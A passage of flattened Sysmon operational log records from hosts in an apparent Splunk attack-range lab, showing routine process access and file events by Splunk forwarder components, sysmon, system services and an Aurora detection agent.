Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018552Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018551Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018550Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018549Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018548Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018547Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018546Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018545Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018544Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000018543Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E62A-63C7-3702-00000000B002}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000018542Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.549{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E62A-63C7-3702-00000000B002}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000018541Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.551{E5A8D418-E62A-63C7-3702-00000000B002}2592C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000018540Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.315{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=939D0156FD485441529D73138C94B5DD,SHA256=F5BB9A262B0DB0FFAC65511954D3A9673CCEF1A414D1ECFF6B6260E47BEB76B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000018539Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.238{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FED2FB9C6416510EFD52EA9DF83591E7,SHA256=FD65E0D2B20C6BBA16895EB8530C6E7AA77B735E1B6169870EB1B13B17C9360F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000018538Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:30.088{E5A8D418-E629-63C7-3602-00000000B002}15324032C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000046267Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:30.095{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8A5E37D42364CC79E967AAD03B2D5578,SHA256=E88ABBED08327FC22679454BF5DC1B777A3AA069425C5308303BD96E406B139B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000018570Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.840{E5A8D418-E62B-63C7-3802-00000000B002}40883776C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+606005|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+605b36|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+75996|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+9dd220|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018569Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:29:31.762{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A2737A598BE2B5F337E8C356535E7BA,SHA256=BFE8488CDB3BB3B3D02A571B3EA15EC28C6E5B073B4FAFC16E35D6E57C5683AB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000046323Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\system32\dns.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046322Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2400-00000000AF02}2492C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046321Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.851{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.849{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.846{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.833{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.829{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.824{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.821{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.820{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.818{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(000000001631A190) 10341000x800000000000000046312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:29:31.796{FE4C2B44-DE08-63C7-F104-00000000AF02}60686488C:\Program 